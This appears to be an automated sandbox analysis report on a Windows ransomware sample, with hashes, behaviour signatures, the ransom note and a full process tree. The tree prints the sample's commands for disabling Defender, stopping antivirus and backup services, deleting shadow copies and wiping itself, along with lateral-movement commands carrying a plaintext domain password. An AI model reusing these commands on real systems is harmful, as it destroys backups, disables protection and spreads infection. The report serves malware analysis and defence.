Analysis
-
max time kernel
81s -
max time network
142s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
10-07-2020 06:52
Static task
static1
Behavioral task
behavioral1
Sample
safeboot network ransomware.exe
Resource
win7
Behavioral task
behavioral2
Sample
safeboot network ransomware.exe
Resource
win10v200430
General
-
Target
safeboot network ransomware.exe
-
Size
82KB
-
MD5
e01e11dca5e8b08fc8231b1cb6e2048c
-
SHA1
4983d07f004436caa3f10b38adacbba6a4ede01a
-
SHA256
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f
-
SHA512
298bfb9fe55ddd80f1c6671622d7e9e865899a855b5bb8e0d85d8520160cedca6fd8bc72c9881925477bcab883bf6e6f4c69f997b774b74fe992e023a81269de
Malware Config
Signatures
-
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
safeboot network ransomware.exepid process 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe -
Drops startup file 1 IoCs
Processes:
safeboot network ransomware.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk safeboot network ransomware.exe -
Executes dropped EXE 1 IoCs
Processes:
gvx4wrbz.exepid process 3796 gvx4wrbz.exe -
Blacklisted process makes network request 3 IoCs
Processes:
mshta.exeflow pid process 19 4868 mshta.exe 21 4868 mshta.exe 23 4868 mshta.exe -
Modifies WinLogon 2 TTPs 2 IoCs
Processes:
safeboot network ransomware.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." safeboot network ransomware.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n" safeboot network ransomware.exe -
Suspicious behavior: EnumeratesProcesses 3067 IoCs
Processes:
safeboot network ransomware.exepid process 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe -
Suspicious use of WriteProcessMemory 233 IoCs
Processes:
safeboot network ransomware.exenet.exenet.exenet.exenet.exedescription pid process target process PID 2536 wrote to memory of 652 2536 safeboot network ransomware.exe powershell.exe PID 2536 wrote to memory of 652 2536 safeboot network ransomware.exe powershell.exe PID 2536 wrote to memory of 1732 2536 safeboot network ransomware.exe powershell.exe PID 2536 wrote to memory of 1732 2536 safeboot network ransomware.exe powershell.exe PID 2536 wrote to memory of 1668 2536 safeboot network ransomware.exe powershell.exe PID 2536 wrote to memory of 1668 2536 safeboot network ransomware.exe powershell.exe PID 2536 wrote to memory of 2088 2536 safeboot network ransomware.exe powershell.exe PID 2536 wrote to memory of 2088 2536 safeboot network ransomware.exe powershell.exe PID 2536 wrote to memory of 2652 2536 safeboot network ransomware.exe powershell.exe PID 2536 wrote to memory of 2652 2536 safeboot network ransomware.exe powershell.exe PID 2536 wrote to memory of 3060 2536 safeboot network ransomware.exe powershell.exe PID 2536 wrote to memory of 3060 2536 safeboot network ransomware.exe powershell.exe PID 2536 wrote to memory of 2004 2536 safeboot network ransomware.exe powershell.exe PID 2536 wrote to memory of 2004 2536 safeboot network ransomware.exe powershell.exe PID 2536 wrote to memory of 3096 2536 safeboot network ransomware.exe powershell.exe PID 2536 wrote to memory of 3096 2536 safeboot network ransomware.exe powershell.exe PID 2536 wrote to memory of 2200 2536 safeboot network ransomware.exe powershell.exe PID 2536 wrote to memory of 2200 2536 safeboot network ransomware.exe powershell.exe PID 2536 wrote to memory of 1236 2536 safeboot network ransomware.exe powershell.exe PID 2536 wrote to memory of 1236 2536 safeboot network ransomware.exe powershell.exe PID 2536 wrote to memory of 1748 2536 safeboot network ransomware.exe powershell.exe PID 2536 wrote to memory of 1748 2536 safeboot network ransomware.exe powershell.exe PID 2536 wrote to memory of 4180 2536 safeboot network ransomware.exe powershell.exe PID 2536 wrote to memory of 4180 2536 safeboot network ransomware.exe powershell.exe PID 2536 wrote to memory of 4304 2536 safeboot network ransomware.exe powershell.exe PID 2536 wrote to memory of 4304 2536 safeboot network ransomware.exe powershell.exe PID 2536 wrote to memory of 4356 2536 safeboot network ransomware.exe net.exe PID 2536 wrote to memory of 4356 2536 safeboot network ransomware.exe net.exe PID 2536 wrote to memory of 4368 2536 safeboot network ransomware.exe net.exe PID 2536 wrote to memory of 4368 2536 safeboot network ransomware.exe net.exe PID 2536 wrote to memory of 4396 2536 safeboot network ransomware.exe net.exe PID 2536 wrote to memory of 4396 2536 safeboot network ransomware.exe net.exe PID 2536 wrote to memory of 4428 2536 safeboot network ransomware.exe net.exe PID 2536 wrote to memory of 4428 2536 safeboot network ransomware.exe net.exe PID 2536 wrote to memory of 4468 2536 safeboot network ransomware.exe net.exe PID 2536 wrote to memory of 4468 2536 safeboot network ransomware.exe net.exe PID 2536 wrote to memory of 4528 2536 safeboot network ransomware.exe net.exe PID 2536 wrote to memory of 4528 2536 safeboot network ransomware.exe net.exe PID 2536 wrote to memory of 4568 2536 safeboot network ransomware.exe net.exe PID 2536 wrote to memory of 4568 2536 safeboot network ransomware.exe net.exe PID 2536 wrote to memory of 4612 2536 safeboot network ransomware.exe net.exe PID 2536 wrote to memory of 4612 2536 safeboot network ransomware.exe net.exe PID 2536 wrote to memory of 4656 2536 safeboot network ransomware.exe net.exe PID 2536 wrote to memory of 4656 2536 safeboot network ransomware.exe net.exe PID 2536 wrote to memory of 4688 2536 safeboot network ransomware.exe net.exe PID 2536 wrote to memory of 4688 2536 safeboot network ransomware.exe net.exe PID 2536 wrote to memory of 4724 2536 safeboot network ransomware.exe net.exe PID 2536 wrote to memory of 4724 2536 safeboot network ransomware.exe net.exe PID 4356 wrote to memory of 4752 4356 net.exe net1.exe PID 4356 wrote to memory of 4752 4356 net.exe net1.exe PID 4368 wrote to memory of 4780 4368 net.exe net1.exe PID 4368 wrote to memory of 4780 4368 net.exe net1.exe PID 2536 wrote to memory of 4796 2536 safeboot network ransomware.exe net.exe PID 2536 wrote to memory of 4796 2536 safeboot network ransomware.exe net.exe PID 2536 wrote to memory of 4828 2536 safeboot network ransomware.exe net.exe PID 2536 wrote to memory of 4828 2536 safeboot network ransomware.exe net.exe PID 4396 wrote to memory of 4868 4396 net.exe net1.exe PID 4396 wrote to memory of 4868 4396 net.exe net1.exe PID 2536 wrote to memory of 4896 2536 safeboot network ransomware.exe net.exe PID 2536 wrote to memory of 4896 2536 safeboot network ransomware.exe net.exe PID 4428 wrote to memory of 4924 4428 net.exe net1.exe PID 4428 wrote to memory of 4924 4428 net.exe net1.exe PID 2536 wrote to memory of 4948 2536 safeboot network ransomware.exe net.exe PID 2536 wrote to memory of 4948 2536 safeboot network ransomware.exe net.exe -
Interacts with shadow copies 2 TTPs 14 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid process 5376 vssadmin.exe 4792 vssadmin.exe 4808 vssadmin.exe 4836 vssadmin.exe 4848 vssadmin.exe 4856 vssadmin.exe 4576 vssadmin.exe 4932 vssadmin.exe 4896 vssadmin.exe 4452 vssadmin.exe 6040 vssadmin.exe 4324 vssadmin.exe 4640 vssadmin.exe 4628 vssadmin.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Processes:
safeboot network ransomware.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" safeboot network ransomware.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" safeboot network ransomware.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" safeboot network ransomware.exe -
Suspicious use of AdjustPrivilegeToken 296 IoCs
Processes:
safeboot network ransomware.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2536 safeboot network ransomware.exe Token: SeDebugPrivilege 652 powershell.exe Token: SeIncreaseQuotaPrivilege 652 powershell.exe Token: SeSecurityPrivilege 652 powershell.exe Token: SeTakeOwnershipPrivilege 652 powershell.exe Token: SeLoadDriverPrivilege 652 powershell.exe Token: SeSystemProfilePrivilege 652 powershell.exe Token: SeSystemtimePrivilege 652 powershell.exe Token: SeProfSingleProcessPrivilege 652 powershell.exe Token: SeIncBasePriorityPrivilege 652 powershell.exe Token: SeCreatePagefilePrivilege 652 powershell.exe Token: SeBackupPrivilege 652 powershell.exe Token: SeRestorePrivilege 652 powershell.exe Token: SeShutdownPrivilege 652 powershell.exe Token: SeDebugPrivilege 652 powershell.exe Token: SeSystemEnvironmentPrivilege 652 powershell.exe Token: SeRemoteShutdownPrivilege 652 powershell.exe Token: SeUndockPrivilege 652 powershell.exe Token: SeManageVolumePrivilege 652 powershell.exe Token: 33 652 powershell.exe Token: 34 652 powershell.exe Token: 35 652 powershell.exe Token: 36 652 powershell.exe Token: SeDebugPrivilege 1732 powershell.exe Token: SeDebugPrivilege 1668 powershell.exe Token: SeDebugPrivilege 2088 powershell.exe Token: SeDebugPrivilege 2652 powershell.exe Token: SeDebugPrivilege 3060 powershell.exe Token: SeDebugPrivilege 2004 powershell.exe Token: SeDebugPrivilege 3096 powershell.exe Token: SeIncreaseQuotaPrivilege 1732 powershell.exe Token: SeSecurityPrivilege 1732 powershell.exe Token: SeTakeOwnershipPrivilege 1732 powershell.exe Token: SeLoadDriverPrivilege 1732 powershell.exe Token: SeSystemProfilePrivilege 1732 powershell.exe Token: SeSystemtimePrivilege 1732 powershell.exe Token: SeProfSingleProcessPrivilege 1732 powershell.exe Token: SeIncBasePriorityPrivilege 1732 powershell.exe Token: SeCreatePagefilePrivilege 1732 powershell.exe Token: SeBackupPrivilege 1732 powershell.exe Token: SeRestorePrivilege 1732 powershell.exe Token: SeShutdownPrivilege 1732 powershell.exe Token: SeDebugPrivilege 1732 powershell.exe Token: SeSystemEnvironmentPrivilege 1732 powershell.exe Token: SeRemoteShutdownPrivilege 1732 powershell.exe Token: SeUndockPrivilege 1732 powershell.exe Token: SeManageVolumePrivilege 1732 powershell.exe Token: 33 1732 powershell.exe Token: 34 1732 powershell.exe Token: 35 1732 powershell.exe Token: 36 1732 powershell.exe Token: SeIncreaseQuotaPrivilege 2088 powershell.exe Token: SeSecurityPrivilege 2088 powershell.exe Token: SeTakeOwnershipPrivilege 2088 powershell.exe Token: SeLoadDriverPrivilege 2088 powershell.exe Token: SeSystemProfilePrivilege 2088 powershell.exe Token: SeSystemtimePrivilege 2088 powershell.exe Token: SeProfSingleProcessPrivilege 2088 powershell.exe Token: SeIncBasePriorityPrivilege 2088 powershell.exe Token: SeCreatePagefilePrivilege 2088 powershell.exe Token: SeBackupPrivilege 2088 powershell.exe Token: SeRestorePrivilege 2088 powershell.exe Token: SeShutdownPrivilege 2088 powershell.exe Token: SeDebugPrivilege 2088 powershell.exe -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
safeboot network ransomware.exepid process 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe 2536 safeboot network ransomware.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 3872 taskkill.exe 4240 taskkill.exe 5260 taskkill.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Runs net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\safeboot network ransomware.exe"C:\Users\Admin\AppData\Local\Temp\safeboot network ransomware.exe"1⤵
- Suspicious use of FindShellTrayWindow
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Modifies Windows Defender Real-time Protection settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
PID:2536 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious use of AdjustPrivilegeToken
PID:652 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1732 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1668 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2088 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2652 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3060 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2004 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 62⤵
- Suspicious use of AdjustPrivilegeToken
PID:3096 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 02⤵PID:2200
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 62⤵PID:1236
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 62⤵PID:1748
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true2⤵PID:4180
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 22⤵PID:4304
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop avpsus /y2⤵
- Suspicious use of WriteProcessMemory
PID:4356 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵PID:4752
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
- Suspicious use of WriteProcessMemory
PID:4368 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵PID:4780
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfewc /y2⤵
- Suspicious use of WriteProcessMemory
PID:4396 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵PID:4868
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BMR Boot Service /y2⤵
- Suspicious use of WriteProcessMemory
PID:4428 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵PID:4924
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵PID:4468
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵PID:5000
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop DefWatch /y2⤵PID:4528
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵PID:5008
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccEvtMgr /y2⤵PID:4568
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵PID:5060
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccSetMgr /y2⤵PID:4612
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵PID:4200
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SavRoam /y2⤵PID:4656
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵PID:4364
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop RTVscan /y2⤵PID:4688
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵PID:4564
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBFCService /y2⤵PID:4724
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵PID:2180
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBIDPService /y2⤵PID:4796
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵PID:4996
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵PID:4828
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵PID:5132
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBCFMonitorService /y2⤵PID:4896
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵PID:5284
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooBackup /y2⤵PID:4948
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵PID:5324
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooIT /y2⤵PID:5028
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵PID:5404
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop zhudongfangyu /y2⤵PID:5108
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵PID:5448
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop stc_raw_agent /y2⤵PID:2988
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵PID:5508
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VSNAPVSS /y2⤵PID:3636
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵PID:5576
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:4760
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵PID:5608
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:5016
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵PID:5708
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:4824
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵PID:5720
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop veeam /y2⤵PID:5176
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵PID:5876
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop PDVFSService /y2⤵PID:5248
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵PID:5940
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:5336
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵PID:5980
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:5384
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵PID:6068
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:5468
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵PID:6116
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵PID:5520
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵PID:1128
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:5560
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵PID:4472
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:5640
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵PID:4584
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:5684
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵PID:5748
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:5764
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵PID:4924
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcronisAgent /y2⤵PID:5828
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵PID:4556
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵PID:5900
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵PID:4812
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵PID:5968
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y3⤵PID:5124
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sophos /y2⤵PID:6028
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵PID:5816
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵PID:6084
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵PID:5184
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵PID:5864
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵PID:4436
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
PID:3872 -
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
PID:4240 -
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
PID:5260 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:4324 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:4848 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:4640 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:4896 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:4452 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:4628 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:6040 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:4792 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:4808 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:4856 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:4836 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:5376 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:4576 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:4932 -
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin2⤵PID:5164
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.26 /USER:SHJPOLICE\amer !Omar20122⤵PID:5584
-
C:\Users\Admin\AppData\Local\Temp\gvx4wrbz.exe"C:\Users\Admin\AppData\Local\Temp\gvx4wrbz.exe" \10.10.0.26 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\AppData\Local\Temp\safeboot network ransomware.exe2⤵
- Executes dropped EXE
PID:3796 -
C:\Windows\SYSTEM32\arp.exe"arp" -a2⤵PID:2776
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta2⤵
- Blacklisted process makes network request
PID:4868 -
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵PID:4196
-
C:\Windows\system32\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
PID:2820 -
